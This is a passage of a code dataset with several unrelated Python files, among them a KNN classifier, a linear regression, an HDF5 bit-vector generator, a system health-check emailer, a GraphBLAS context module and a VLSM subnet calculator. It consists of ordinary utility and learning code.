torch.nn.functional.interpolate(input=tenPreprocessedFirst, size=(intPreprocessedHeight, intPreprocessedWidth), mode='bilinear', align_corners=False)\n\ttenPreprocessedSecond = torch.nn.functional.interpolate(input=tenPreprocessedSecond, size=(intPreprocessedHeight, intPreprocessedWidth), mode='bilinear', align_corners=False)\n\n\ttenFlow = 20.0 * torch.nn.functional.interpolate(input=netNetwork(tenPreprocessedFirst, tenPreprocessedSecond), size=(intHeight, intWidth), mode='bilinear', align_corners=False)\n\n\ttenFlow[:, 0, :, :] *= float(intWidth) / float(intPreprocessedWidth)\n\ttenFlow[:, 1, :, :] *= float(intHeight) / float(intPreprocessedHeight)\n\n\treturn tenFlow[0, :, :, :].cpu()\n# end","sub_path":"asset/flow.py","file_name":"flow.py","file_ext":"py","file_size_in_byte":12260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"529222389","text":"from .distances import euclidean\nimport numpy\n\nclass KNN:\n\n\tdef __init__(self, k, trainingset, distanceFunction=euclidean):\n\t\tself.k = k\n\t\tself.distf = 
distanceFunction\n\t\tneighbors = []\n\t\tclss = []\n\t\tfor line in trainingset:\n\t\t\tneighbors += [line[:-1]]\n\t\t\tclss += [line[-1]]\n\t\tself.neighbors = numpy.array(neighbors)\n\t\tself.clss = numpy.array(clss)\n\n\tdef classify(self, datapoint):\n\t\tfrom scipy import stats\n\t\timport copy\n\t\t# map() returns an iterator in Python 3; materialise it so it can be copied and sorted\n\t\tdist = list(map(self.distf, repeat(datapoint,len(self.neighbors)), \\\n\t\t          self.neighbors))\n\t\tds = copy.copy(dist)\n\t\tdist.sort()\n\t\tclss = []\n\t\tfor i in range(self.k):\n\t\t\tind = ds.index(dist[i])\n\t\t\tclss += [self.clss[ind]]\n\t\treturn int(stats.mode(clss)[0][0])\n\ndef repeat(array, times):\n\tr = []\n\tfor i in range(0, times):\n\t\tr += [array]\n\treturn r\n","sub_path":"pyRecog/distbased/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"280368113","text":"# https://machinelearningmastery.com/implement-simple-linear-regression-scratch-python/\n\nfrom math import sqrt\n\n\ndef mean(x):\n    return sum(x) / len(x)\n\n\ndef variance(x):\n    mean_ = mean(x)\n    return sum([(i - mean_)**2 for i in x])\n\n\ndef covariance(x, y):\n    x_mean = mean(x)\n    y_mean = mean(y)\n    covar = 0.0\n    for i in range(len(x)):\n        covar += (x[i] - x_mean) * (y[i] - y_mean)\n    return covar\n\n\ndef coefs(X):\n    x = [row[0] for row in X]\n    y = [row[1] for row in X]\n    x_mean, y_mean = mean(x), mean(y)\n    b1 = covariance(x, y) / variance(x)\n    b0 = y_mean - b1 * x_mean\n    return [b0, b1]\n\n\ndef rmse(true, predicted):\n    loss = 0.0\n    for i in range(len(true)):\n        loss += ((predicted[i] - true[i])**2)\n    return sqrt(loss/len(true))\n\n\ndef linear_regression(train, test):\n    predictions = []\n    b0, b1 = coefs(train)\n    for row in test:\n        predictions.append(b0 + b1 * row[0])\n    return predictions\n\n\ndataset = [[1, 1], [2, 3], [4, 3], [3, 2], [5, 5]]\n","sub_path":"src/linear-regression.py","file_name":"linear-regression.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"99704188","text":"#!/bin/python\nimport os\nimport sys\nimport re\n\n\ndef dir_filter(path, f_regex, d_regex, f_sid=1, d_sid=1):\n\t\"\"\"\n\treturns all matching files sorted, including matching dirs and their files\n\tthe `*_regex` is the regular expression used to match, `*_sid` the index of the\n\tgroup used to extract the sorting key\n\t`f_*` stands for file related configuration \n\t`d_*` stands for dir related configuration\n\tnote the key has to be convertible to int!\n\t\"\"\"\n\tresult = {}\n\tfor item in os.listdir(path):\n\t\tfitem = os.path.join(path, item)\n\t\tif os.path.isfile(fitem):\n\t\t\tm = f_regex.match(item)\n\t\t\tif m:\n\t\t\t\tresult[int(m.group(f_sid))] = fitem\n\t\telif os.path.isdir(fitem):\n\t\t\tm = d_regex.match(item)\n\t\t\tif m:\n\t\t\t\tresult[int(m.group(d_sid))] = dir_filter(fitem, f_regex, d_regex)\n\treturn result\n\ndef sort_and_flaten(diclist): \n\tresult = []\n\tfor key in sorted(diclist.keys()):\n\t\tvalue = diclist[key]\n\t\tif isinstance(value, dict):\n\t\t\tresult += sort_and_flaten(value)\n\t\telse:\n\t\t\tresult.append(value)\n\treturn result\n\ndef str_latex_input(listing):\n\tprints = map(lambda x: \"\\\\input{\"+x+\"}\", listing)\n\treturn os.linesep.join(prints)\n\t\ndef write_latex_input(target, listing):\n\twith open(target,'w') as f:\n\t\tf.write(\"%%automatically generated latex include file\"+os.linesep)\n\t\tf.write(str_latex_input(listing))\n\n\nif __name__ == '__main__':\n\t\n\tif 
len(sys.argv) != 5: \n\t\tprint(\"invalide syntax\")\n\t\tprint(\"python setupFiles.py \")\n\t\texit(1)\n\n\tinclude_regex = re.compile(sys.argv[1]+sys.argv[2])\n\tinclude_dir_regex = re.compile(sys.argv[1])\n\ttarget = sys.argv[3]\n\tpath = sys.argv[4]\n\n\twrite_latex_input( \n\t\ttarget, \n\t\tsort_and_flaten( \n\t\t\tdir_filter(\n\t\t\t\tpath, \n\t\t\t\tinclude_regex, \n\t\t\t\tinclude_dir_regex\n\t\t\t)\n\t\t)\n\t)\n\n","sub_path":"setupFiles.py","file_name":"setupFiles.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"285941855","text":"class doubly_linked_chain:\n ''' A chain of containers linked together by pointers without order. '''\n\n \n class node:\n ''' A container with two pointers one pointing to the previous one pointing to the next element.\n A new node is created by giving it an an item and the two links.\n Example: node(previous Node, item, next node)\n The searchkey for a node is its item if its a single value or its first object if it's a list.'''\n def __init__(self,prevNode,item,nextNode, searchKey = 0):\n self.next = nextNode\n self.prev = prevNode\n self.item = item\n if searchKey == 0:\n self.searchKey = item\n if type(item) == type([]):\n self.searchKey = item[0]\n else:\n self.searchKey = searchKey\n\n \n \n def __init__(self):\n dummy_head_node = self.node(None,None,None) #a dummy head Node to prevent the special case of inserting at the head.\n self.headPtr = dummy_head_node\n self.tailPtr = dummy_head_node\n self.length = 0\n\n def __reset_tailPtr(self):\n ''' Sets the tail pointer to the last Position again in case something is added or removed from the tail of the chain. '''\n def isLastNode(node):\n if node.next == None:\n return node\n self.tailPtr = self.traverse(isLastNode)\n \n\n def insert(self,item, searchkey=0):\n ''' Adds an item to the front of the chain after the dummy head node.'''\n dummyHeadNode = self.headPtr\n nextNode = dummyHeadNode.next\n tmpNode = self.node(dummyHeadNode,item,dummyHeadNode.next,searchkey)\n dummyHeadNode.next = tmpNode\n if nextNode != None:\n nextNode.prev = tmpNode\n self.length +=1\n self.__reset_tailPtr()\n\n\n def traverse(self,visit):\n ''' Traverses the chain from the head to the tail calling visit(current node) at each node.\n If visit is a fruitfull function the traversal will be stopped when another value than\n None is returned and the by visit returned value will be returned by traverse().\n '''\n tmpNode = self.headPtr\n tmpNode = tmpNode.next #skip the dummy head node\n while tmpNode != None:\n tmp = visit(tmpNode)\n if tmp != None:\n return tmp\n tmpNode = tmpNode.next\n\n def remove(self,searchKey):\n ''' Removes the first node with the given searchkey from the chain.\n The method returns True if it was successfull or False if not.\n '''\n tmp = self.getNode(searchKey)\n \n if tmp == None:\n return False\n prevNode = tmp.prev\n nextNode = tmp.next\n prevNode.next = nextNode\n if nextNode != None:\n nextNode.prev = prevNode\n self.length -=1\n self.__reset_tailPtr()\n return True\n\n\n def clear(self):\n ''' Removes all the nodes from the chain except for the dummy head node. 
'''\n dummyHeadNode = self.headPtr\n dummyHeadNode.next = None\n self.tailPtr = dummyHeadNode\n \n\n def getNode(self,searchKey):\n ''' Returns the first node found with the given searchkey.'''\n def compare(node):\n if node.searchKey == searchKey:\n return node\n return self.traverse(compare)\n\n def getItem(self, searchKey):\n ''' Returns the first item found with the given searchkey. '''\n node = self.getNode(searchKey)\n if node:\n return node.item\n else:\n return False\n\n def isEmpty(self):\n ''' Returns True if the chain is empty or false if not. '''\n if self.tailPtr is None:\n return True\n return False\n\n def getTraverse(self):\n ''' returns a list of all the items in the chain '''\n tmpList = []\n tmpNode = self.headPtr\n tmpNode = tmpNode.next #skip the dummy head node\n while tmpNode != None:\n tmpList.append(tmpNode.item)\n tmpNode = tmpNode.next\n return tmpList\n\n","sub_path":"Main (python code)/ADT/Table/doubly_linked_chain.py","file_name":"doubly_linked_chain.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"218896823","text":"import numpy as np\nimport datetime\nimport h5py\nimport sys\nimport argparse\nfrom time import time\nimport re\nimport os\n\nparameter_help = \"\"\"\nDataset Info\n------------\n\nseed : int64; default = 65536\n A value to initiate the random number generator. Setting to 0 will result in random seed generation based on current time.\n\nvector_length : int\n Number of elements per vector (a.k.a \"vector length\"), determines number of columns in the matrix\n\nvector_count : int\n Number of vectors to be generated, equal to number of rows in the matrix\n\nstorage : [\"bool\", \"byte\", \"uint32\"]; default = \"byte\"\n The format in which the values should be stored.\n bool: matrices are stored as bool values, single element contains single value\n byte: matrices are stored as byte/int8, single element contains 8 values (vector_length must be divisible by 8)\n uint32: matrices are stored as uint32, single element contains 32 values (vector_length must be divisible by 32)\n\nrandomization : [\"mutate\", \"full\", \"sparse\"]; default = \"mutate\"\n The way the vectors are generated.\n mutate: the template vector is generated randomly and then a percentage of the values are randomly changed to generate each vector in the matrix\n full: all vectors are completely randomly generated\n sparse: the template vector is set to zeros; the vectors in the matrix are generated by activating a percentage of random bits\n\nactive_fraction : float in range (0, 1); default 0.2\n This value is used if randomization is set to \"mutate\" or \"sparse\" as the fraction (\"percentage\") to determine how many bits should be manipulated.\n\nrandom_fraction : float in range (0, 1); default 0.0\n !!! not implemented yet !!!\n Additional randomization for the active_fraction parameter. If above zero, the active fraction is not fixed but randomly shifted by up to \n amount. 
E.g., if active_fraction=0.5 and random_fraction=0.2, the active fraction for each vector will be randomly selected from range (0.3, 0.7).\n\nuse_fletcher : bool; default = True\n\"\"\"\n\n# generate random seed\ncurrent_dt = datetime.datetime.now()\n# seed = int(current_dt.timestamp())\nseed = 65536\n\nstamp = current_dt.strftime(\"%Y-%m-%d_%H-%M-%S\")\n\nuse_fletcher = True\ncompression_level = 3\n\ndatapath = \"data\"\nstorage_types = [\"bool\", \"byte\", \"uint32\"]\n\nprint(f\"Initializing dataset generation with seed: {seed} at {stamp}.\")\n\ninfo = {\n \"alg_version\": 0.2, # for forward compatibility only\n \"seed\": seed,\n \"vector_length\": int(2**18),\n \"vector_count\": int(1e4),\n \"storage\": \"uint32\",\n \"randomization\": \"mutate\",\n \"active_fraction\": 0.2,\n \"random_fraction\": 0.0,\n \"stamp\": stamp,\n \"use_fletcher\": use_fletcher,\n \"compression_level\": compression_level\n}\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"n_vector\", help=\"Number of vectors in data. Python expressions can be used, i.e. 1e3 == 1000.\")\nparser.add_argument(\"n_elements\", help=\"Number of elements in each vector (i.e. vector length). Python expressions can be used, i.e. 2**16 == 65536\")\nparser.add_argument(\"--path\", \"-p\", default=datapath,\n help=f\"Path to the data folder. (default = 'data')\")\nparser.add_argument(\"--storages\", \"-s\", choices=storage_types, action=\"append\", default=[],\n help=f\"Choose which storage types to generate. Can be used multiple times to generate multiple storage types.\")\n\nargs = parser.parse_args()\n\ndatapath = args.path\nstorages = args.storages\ninfo[\"vector_count\"] = int(eval(args.n_vector))\ninfo[\"vector_length\"] = int(eval(args.n_elements))\n\n# for (k, v) in info.items():\n# ma, mb = re.search(r\"^(\\w)\", k), re.search(r\"_?(?<=\\_)(\\w)\", k)\n# short = \"-\" + ma.group(0) + (mb.group(1) if mb is not None else \"\")\n\n# parser.add_argument(\"--\" + k, short)\n\ndef activate(x, f, s):\n \"\"\"Activate \"f\" fraction of total \"s\" bits in the array \"x\"\n \"\"\"\n x[rng.choice(s, int(f*s), False)] = True\n return x\n\n\ndef mutate(x, f, s):\n \"\"\"Mutate \"f\" fraction of total \"s\" bits in the array \"x\"\n \"\"\"\n x[rng.choice(s, int(f*s), False)] ^= True\n return x\n\n\nfor storage in storages:\n info[\"storage\"] = storage\n\n print(f\"Settings:\\n- number of vectors: {info['vector_count']}\\n- vector length: {info['vector_length']}\\n- storage type: {info['storage']}\"\n + \"\\n- randomization method: {info['randomization']}\\n- active fraction: {info['active_fraction']}\\n- random fraction: {info['random_fraction']}\"\n + \"\\n- version: {info['version']}\")\n\n rng = np.random.RandomState(info[\"seed\"])\n\n vector_shape = (int(info[\"vector_length\"]), 1)\n matrix_shape = (int(info[\"vector_count\"]), int(info[\"vector_length\"]))\n rng_max_val = 2\n dtype = np.bool\n\n # old version\n # if info[\"storage\"] == \"bool\":\n # vector_shape = (info[\"vector_length\"], 1)\n # matrix_shape = (info[\"vector_count\"], info[\"vector_length\"])\n # rng_max_val = 2\n # dtype = np.bool\n # elif info[\"storage\"] == \"byte\":\n # if info[\"vector_length\"] % 8 != 0:\n # raise Exception(\"The parameter must be divisible by 8 when using 'byte' !\")\n # vector_shape = (info[\"vector_length\"] >> 3, 1)\n # matrix_shape = (info[\"vector_count\"] >> 3, info[\"vector_length\"])\n # rng_max_val = 8\n # dtype = np.bool\n # elif info[\"storage\"] == \"uint32\":\n # if info[\"vector_length\"] % 32 != 0:\n # raise 
Exception(\"The parameter must be divisible by 32 when using 'uint32' !\")\n # vector_shape = (info[\"vector_length\"] >> 5, 1)\n # matrix_shape = (info[\"vector_count\"] >> 5, info[\"vector_length\"])\n # rng_max_val = 32\n # dtype = np.bool\n # else:\n # raise Exception(f\"Unknown storage type: {info['storage']}!\")\n\n\n print(\"Generating data...\")\n\n if info[\"randomization\"] == \"full\":\n # do full randomization\n vector = rng.randint(0, rng_max_val, vector_shape, dtype)\n matrix = rng.randint(0, rng_max_val, matrix_shape, dtype)\n elif info[\"randomization\"] == \"mutate\":\n vector = rng.randint(0, rng_max_val, vector_shape, dtype)\n matrix = np.tile(vector.T, (matrix_shape[0], 1))\n matrix = np.apply_along_axis(mutate, 0, matrix.T, info[\"active_fraction\"], info[\"vector_length\"]).T\n elif info[\"randomization\"] == \"sparse\":\n vector = np.zeros(vector_shape, dtype=dtype)\n matrix = np.zeros(matrix_shape, dtype=dtype)\n matrix = np.apply_along_axis(activate, 0, matrix.T, 0, info[\"active_fraction\"], info[\"vector_length\"]).T\n else:\n raise Exception(f\"Unknown randomization method {info['randomization']}!\")\n\n print(\"Data generation complete. Compressing data (if necessary).\")\n # compress\n order = sys.byteorder\n if info[\"storage\"] == \"bool\":\n pass # no compression\n elif info[\"storage\"] == \"byte\":\n if info[\"vector_length\"] % 8 != 0:\n raise Exception(\"The parameter 'vector_length' must be divisible by 8 when using 'byte' storage!\")\n matrix = np.packbits(matrix, 1, bitorder=\"big\").reshape(matrix_shape[0], vector_shape[0] >> 3)\n vector = np.packbits(vector, bitorder=\"big\")[:, np.newaxis]\n elif info[\"storage\"] == \"uint32\":\n if info[\"vector_length\"] % 32 != 0:\n raise Exception(\"The parameter 'vector_length' must be divisible by 32 when using 'uint32' storage!\")\n if order == \"little\":\n matrix = np.packbits(matrix.reshape(-1, 4, 8)[:, ::-1], bitorder=\"big\").view(np.uint32).reshape(matrix_shape[0], vector_shape[0] >> 5)\n vector = np.packbits(vector.reshape(-1, 4, 8)[:, ::-1], bitorder=\"big\").view(np.uint32)[:, np.newaxis]\n else:\n matrix = np.packbits(matrix.reshape(-1, 4, 8), bitorder=\"big\").view(np.uint32).reshape(matrix_shape[0], vector_shape[0] >> 5)\n vector = np.packbits(vector.reshape(-1, 4, 8), bitorder=\"big\").view(np.uint32)[:, np.newaxis]\n else:\n raise Exception(f\"Unknown storage type: {info['storage']}!\")\n\n filename = os.path.join(datapath, f\"bits_{info['vector_count']}x{info['vector_length']}_{info['storage']}_{info['randomization']}.hdf5\")\n print(f\"Saving data to {filename}.\")\n with h5py.File(filename, \"w\") as f:\n f.attrs.update(**info)\n now = time()\n f.create_dataset(\"vector\", data=vector, compression=\"gzip\", compression_opts=compression_level, fletcher32=use_fletcher)\n vector_saving_runtime = time() - now\n print(f\"Vector saved. Saving time was {vector_saving_runtime}s. 
Estimated matrix saving time: {vector_saving_runtime * matrix_shape[0]}s.\")\n        f.create_dataset(\"matrix\", data=matrix, compression=\"gzip\", compression_opts=compression_level, fletcher32=use_fletcher)\n\n    print(\"Done.\")\n","sub_path":"gen_data.py","file_name":"gen_data.py","file_ext":"py","file_size_in_byte":8786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"334905356","text":"#!/usr/bin/env python3\r\n\r\nimport psutil,shutil,socket,emails\r\n\r\ndef error_mail(sub):\r\n\tsender = \"automation@example.com\"\r\n\treceipient = \"student-02-5fcba15d24c9@example.com\"\r\n\tsubject=sub\r\n\tbody=\"Please check your system and resolve the issue as soon as possible.\"\r\n\tmessage=emails.generate_error_email(sender,receipient,subject,body)\r\n\temails.send_email(message)\r\n\r\ndef check_cpu_usage():\r\n\tusage=psutil.cpu_percent(1)\r\n\tif usage>80:\r\n\t\tsub=\"Error - CPU usage is over 80%\"\r\n\t\terror_mail(sub)\r\n\r\ndef check_disk_usage():\r\n\tdu=shutil.disk_usage(\"/\")\r\n\tfree=du.free/du.total*100\r\n\tif free<20:\r\n\t\tsub=\"Error - Available disk space is less than 20%\"\r\n\t\terror_mail(sub)\r\n\r\ndef check_mem():\r\n\tmemory=dict(psutil.virtual_memory()._asdict())[\"available\"]\r\n\tavailable_mem=(memory/1024)/1024\r\n\tif available_mem<500:\r\n\t\tsub=\"Error - Available memory is less than 500MB\"\r\n\t\terror_mail(sub)\r\n\r\ndef check_host():\r\n\tip=socket.gethostbyname(\"localhost\")\r\n\tif ip!=\"127.0.0.1\":\r\n\t\tsub=\"Error - localhost cannot be resolved to 127.0.0.1\"\r\n\t\terror_mail(sub)\r\n\r\nif __name__ == \"__main__\":\r\n\tcheck_cpu_usage()\r\n\tcheck_disk_usage()\r\n\tcheck_mem()\r\n\tcheck_host()","sub_path":"Automate updating catalog information/health_check.py","file_name":"health_check.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"9634014","text":"from functools import wraps\nfrom .exceptions import return_error, GraphBlasException, GrB_Info\n\n\nclass GrB_Mode:\n    GrB_BLOCKING = object()\n    GrB_NONBLOCKING = object()\n\n\n# Decorator to automatically catch exceptions and return GrB_PANIC\n# Also ensures context is set\ndef handle_panic(func):\n    @wraps(func)\n    def new_func(*args, **kwargs):\n        try:\n            if global_context is None:\n                raise GraphBlasException(\"Context has not been initialized\")\n            return func(*args, **kwargs)\n        except Exception as e:\n            return_error(GrB_Info.GrB_PANIC, str(e))\n\n    return new_func\n\n\nglobal_context = None\n\n\nclass Context:\n    def __init__(self, mode):\n        self._mode = mode\n\n    @property\n    def mode(self):\n        return self._mode\n\n\ndef GrB_init(mode):\n    try:\n        global global_context\n        if mode is not GrB_Mode.GrB_BLOCKING and mode is not GrB_Mode.GrB_NONBLOCKING:\n            return_error(GrB_Info.GrB_INVALID_VALUE)\n        if global_context is not None:\n            # a finalized context (mode reset to None) may not be reused;\n            # check that case before the generic double-init error\n            if global_context.mode is None:\n                return_error(\n                    GrB_Info.GrB_INVALID_VALUE, \"Context has been finalized and cannot be reused\",\n                )\n            return_error(GrB_Info.GrB_INVALID_VALUE, \"Context has already been initialized\")\n        global_context = Context(mode)\n        return GrB_Info.GrB_SUCCESS\n    except Exception as e:\n        return_error(GrB_Info.GrB_PANIC, str(e))\n\n\ndef GrB_finalize():\n    try:\n        global global_context\n        if global_context is None:\n            raise GraphBlasException(\"Context is not initialized\")\n        global_context._mode = None\n        return GrB_Info.GrB_SUCCESS\n    except Exception as e:\n        return_error(GrB_Info.GrB_PANIC, str(e))\n\n\ndef 
GrB_wait(obj=None):\n # We don't currently implement non-blocking mode, so always return success\n return GrB_Info.GrB_SUCCESS\n\n\ndef GrB_getVersion(version_ptr, subversion_ptr):\n try:\n version_ptr[0] = 1\n subversion_ptr[0] = 1\n except Exception as e:\n return_error(GrB_Info.GrB_PANIC, str(e))\n","sub_path":"grblas/backends/python/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"226869625","text":"# |`-:_\n# ,----....____ | `+.\n# ( ````----....|___ |\n# \\ _ ````----....____\n# \\ _) ```---.._\n# \\ \\\n# )`.\\ )`. )`. )`. )`. )`. )`. )`. )`. )`. )\n# -' `-' `-' `-' `-' `-' `-' `-' `-' `-' `-' `\n# The Sub: Expeditionary VLSM Calculator\n# Documentation at: https://github.com/TheMagicNacho\n# v0.1.3\n# TODO: Add Max available subnet validator\n# ------------------------------------------------\n# from tabulate import tabulate\n\n\ndef main(): # Main function loops through user input, calculations, and input validation.\n try:\n usr_input_network = init_input() # Gather user input\n input_user_db, input_labels_db = mask_input(usr_input_network) # Build the databases\n db = vlsm(input_user_db, input_labels_db)\n try: # Pints fully formatted calculations.\n printer(db, input_user_db)\n printer_lite(db, input_user_db)\n except: # Prints only CSV because tabulate module is missing.\n print('!!!TABULATE MODULE MISSING. USE CSV!!!')\n printer_lite(db, input_user_db)\n except: # Restarts in the event of impassable error.\n print('RESTART: General Error.')\n main()\n\n\ndef vlsm(input_user_db, input_labels_db): # Primary manager for calculating operations\n og = dict(net_common_name='name', hosts_req=0, hosts_avail=0, hosts_unused=0, net_add=[0, 0, 0, 0], cidr=0,\n sub_mask=[0, 0, 0, 0], sub_start=[0, 0, 0, 0], sub_end=[0, 0, 0, 0], sub_broad=[0, 0, 0, 0],\n sub_wild=[0, 0, 0, 0], sub_delta_r=0)\n n_nets = range(0, input_user_db[0])\n db = {}\n for i in n_nets:\n db[i] = og.copy()\n db[i]['net_common_name'] = input_labels_db[i][0]\n db[i]['hosts_req'] = input_labels_db[i][1]\n if i == 0: # Establish first subnet\n db[0]['net_add'] = input_user_db[1].copy() # Initial net address comes from user input.\n db[0]['cidr'] = int(find_slash(db[0].get('hosts_req'))) # Find the CIDR if dotted decimal is inputed, convert to CIDR\n db[0]['hosts_avail'] = int(find_hosts(db[0].get('cidr')))\n db[0]['hosts_unused'] = db[i].get('hosts_avail') - db[0].get('hosts_req')\n db[0]['sub_mask'] = find_mask(db[0].get('cidr'))\n db[0]['sub_delta_r'] = db[0].get('hosts_avail') + 2\n db[0]['sub_start'] = find_start(db[0], db[0].get('net_add'))\n db[0]['sub_wild'] = find_wildcard(db[0].get('sub_mask'))\n db[0]['sub_broad'] = find_broadcast(db[0].get('sub_wild'), db[0].get('net_add'))\n db[0]['sub_end'] = find_end(db[0], db[0].get('sub_broad'))\n\n\n else: # Operate upon subsequent sub-nets\n db[i]['cidr'] = int(find_slash(db[i].get('hosts_req'))) # Input CIDR from previous calculations\n db[i]['sub_mask'] = find_mask(db[i].get('cidr'))\n db[i]['net_add'] = find_net(db[i], db[i - 1].get('sub_broad'))\n db[i]['hosts_avail'] = int(find_hosts(db[i].get('cidr')))\n db[i]['hosts_unused'] = db[i].get('hosts_avail') - db[i].get('hosts_req')\n db[i]['sub_delta_r'] = db[i].get('hosts_avail') + 2\n db[i]['sub_start'] = find_start(db[i], db[i].get('net_add'))\n db[i]['sub_wild'] = find_wildcard(db[i].get('sub_mask'))\n db[i]['sub_broad'] = find_broadcast(db[i].get('sub_wild'), db[i].get('net_add'))\n 
db[i]['sub_end'] = find_end(db[i], db[i].get('sub_broad'))\n return db\n\n\ndef find_start(db, net_add): # Operates similarly to the find_net. Input: network Address / Output: Start\n if net_add[3] <= 254:\n db['sub_start'][3] = net_add[3] + 1\n db['sub_start'][2] = net_add[2]\n db['sub_start'][1] = net_add[1]\n db['sub_start'][0] = net_add[0]\n elif net_add[2] <= 254:\n db['sub_start'][3] = int(0)\n db['sub_start'][2] = net_add[2] + 1\n db['sub_start'][1] = net_add[1]\n db['sub_start'][0] = net_add[0]\n elif net_add[1] <= 254:\n db['sub_start'][3] = int(0)\n db['sub_start'][2] = int(0)\n db['sub_start'][1] = net_add[1] + 1\n db['sub_start'][0] = net_add[0]\n else:\n db['sub_start'][3] = int(0)\n db['sub_start'][2] = int(0)\n db['sub_start'][1] = int(0)\n db['sub_start'][0] = net_add[1] + 1\n\n start = db['sub_start'].copy()\n return start\n\n\ndef find_end(db, net_broad):\n db['sub_end'][3] = net_broad[3] - 1\n for b in range(0, 2):\n db['sub_end'][b] = net_broad[b]\n end = db['sub_end'].copy()\n return end\n\n\ndef find_slash(sn_hosts): # Used to find the CIDR for subnets past the initial subnet.\n for i in range(0, sn_hosts):\n x = 2 ** i\n if x > sn_hosts + 2:\n return 32 - i\n else:\n continue\n\n\ndef return_ip_net_array(input_network):\n b = [int(i) for i in input_network.split('.')]\n return b\n\n\ndef return_mask_normalized(input_mask):\n if '.' in input_mask:\n mask_given = [int(i) for i in input_mask.split('.')]\n return mask_given\n else:\n cidr = input_mask.replace('/', '')\n mask_from_cidr = find_mask(cidr)\n mask_found = mask_from_cidr\n return mask_found\n\n\ndef return_cidr_normalized(input_cidr):\n mask = input_cidr.split('.')\n if '/' in input_cidr:\n cidr_given = int(input_cidr.replace('/', ''))\n if cidr_given <= int(32):\n return cidr_given\n else:\n print('RESTART: CIDR must be less than 32')\n main()\n elif int(input_cidr):\n input_cidrx = int(input_cidr)\n if input_cidrx <= 32:\n return input_cidrx\n else:\n print('RESTART: CIDR must be less than 32')\n main()\n\n elif len(mask) == 4:\n for i in range(0, 4):\n maskx = input_cidr[i]\n if int(maskx) <= int(255):\n mask_array = [int(i) for i in input_cidr.split('.')]\n return dec_to_bin(mask_array)\n else:\n print('RESTART: Error with mask octett {}'.format(maskx[i]))\n main()\n else:\n print('RESTART General Error with Subnet Mask')\n main()\n\n\ndef dec_to_bin(mask_array): # Create binary array from function input\n mask_bin = []\n for i in range(0, 4):\n z = str(bin(mask_array[i]).replace(\"0b\", \"\"))\n x = z.count('1')\n mask_bin.insert(i, x)\n return sum(mask_bin)\n\n\ndef find_hosts(found_cidr):\n x = 32 - int(found_cidr)\n return (2 ** x) - 2\n\n\ndef find_mask(c): # Create the sub-net mask by using the CIDR. Only called if CIDR is provided by user.\n array_mask = []\n for i in range(0, 4):\n array_mask.append(i)\n c = int(c)\n if c < 8:\n w = 32 - (c + 24)\n array_mask[0] = 256 - 2 ** w\n array_mask[1] = 0\n array_mask[2] = 0\n array_mask[3] = 0\n\n else:\n if c < 16:\n x = 32 - (c + 16)\n array_mask[0] = 255\n array_mask[1] = 256 - (2 ** x)\n array_mask[2] = 0\n array_mask[3] = 0\n else:\n if c < 24:\n y = 32 - (c + 8)\n array_mask[0] = 255\n array_mask[1] = 255\n array_mask[2] = 256 - (2 ** y)\n array_mask[3] = 0\n else:\n z = 32 - c\n array_mask[0] = 255\n array_mask[1] = 255\n array_mask[2] = 255\n array_mask[3] = 256 - (2 ** z)\n return array_mask\n\n## Hidden function. This works, but is not very reliable. 
Using a more robust function title: find_net / Keeping for possible usage in the future.\n# def find_net_add(net, mask):\n# c = [1, 1, 1, 1] # Temporary, colapsable database\n# for i in range(0, 4):\n# c[i] = net[i] & mask[i] # AND the network and the mask\n# return c\n\n\ndef find_net(db, net_add): # Outputs the network address. Input: Broadcast Process: If within range add 1 to octett. Output: Updated network.\n if net_add[3] <= 254:\n db['net_add'][3] = net_add[3] + 1\n db['net_add'][2] = net_add[2]\n db['net_add'][1] = net_add[1]\n db['net_add'][0] = net_add[0]\n elif net_add[2] <= 254:\n db['net_add'][3] = int(0)\n db['net_add'][2] = net_add[2] + 1\n db['net_add'][1] = net_add[1]\n db['net_add'][0] = net_add[0]\n elif net_add[1] <= 254:\n db['net_add'][3] = int(0)\n db['net_add'][2] = int(0)\n db['net_add'][1] = net_add[1] + 1\n db['net_add'][0] = net_add[0]\n else:\n db['net_add'][3] = int(0)\n db['net_add'][2] = int(0)\n db['net_add'][1] = int(0)\n db['net_add'][0] = net_add[1] + 1\n\n start = db['net_add'].copy()\n return start\n\n\ndef find_wildcard(sub_mask):\n c = [1, 1, 1, 1] # Temporary, colapsable database\n for b in range(0, 4):\n c[b] = 255 - sub_mask[b]\n return c\n\n\ndef find_broadcast(wildcard, net_add):\n d = [1, 1, 1, 1] # Temporary, colapsable database\n for i in range(0, 4):\n d[i] = wildcard[i] | int(net_add[i]) # OR operation\n return d\n\n\ndef printer(db, u): # Pretty print the the information.\n table = []\n print('\\n')\n for i in range(0, u[0]):\n table.append(db[i].values())\n headers = db[0].keys()\n print(tabulate(table, headers, tablefmt=\"pipe\", stralign='center', numalign='left'))\n\n\ndef printer_lite(db, input_user_db): # Create the CSV format of information.\n table = []\n print('\\nCSV FORMAT\\n***Copy and Paste the following into a .txt then import the file to excel. Delimitator is colon \":\" ***')\n for i in range(0, 60):\n print(\"=\", end='=')\n print('\\n')\n for header in db[0].keys():\n print(header, end=':')\n print('\\n')\n for i in range(0, input_user_db[0]):\n table.append(db[i].values())\n x = table[i]\n y = list(x)\n for j in range(0, len(y)):\n d = y[j]\n print(d, end=':')\n print('\\n')\n main()\n\n\ndef validate_ip(ip): # Validate IP. If not valid IP, return feedback then restart the program.\n ip = ip.split('.')\n try:\n for i in range(0, 4):\n ipx = ip[i]\n if ipx.isalpha():\n print('RESTART: Error with octett 